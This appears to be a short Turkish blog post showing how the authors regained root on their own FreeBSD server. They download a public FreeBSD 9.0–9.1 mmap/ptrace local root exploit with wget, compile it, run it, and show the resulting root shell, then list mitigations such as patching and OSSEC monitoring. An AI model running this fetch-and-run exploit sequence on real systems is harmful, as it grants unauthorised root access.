FreeBSD 9 Yetki Yükseltme Açıklığı
Bu blog girdisi bizim sunucumuzdan (cehturkiye). Root parolamızı çeşitli nedenlerden dolayı unuttuk, bugün lazım oldu ve aşağıdaki detaylarını aktardığımız FreeBSD 9.0-9.1 sürümlerini etkileyen local root exploit ile yetki arttırımına gittik.
İlgili exploit;
http://www.exploit-db.com/exploits/26368/
Kullanımı
$ wget http://www.exploit-db.com/download/26368 -O exp.c
$ whoami
ozanucar
$ gcc -o exp exp.c
$ chmod +x exp
$ ./exp
FreeBSD 9.{0,1} mmap/ptrace exploit
by Hunger <[email protected]>
# whoami
root
Bu aşamadan sonra root hakları ile sistem yeniden bizim.
- Bu ve benzeri saldırılar için işletim sisteminizi sürekli güncelleyebilir ve upgrade edebilirsiniz.
- Dışarıdan uygulama kurulmaması için internet trafiğini filtreleyebilirsiniz.
- Derleyicileri kaldırabilirsiniz.
- Anormalliklere karşı ve saldırı anında haberdar olmak için dosya/dizin değişikliklerini sürekli takip edebilirsiniz. OSSEC ücretsiz olarak kullanabileceğiniz başarılı bir araçtır.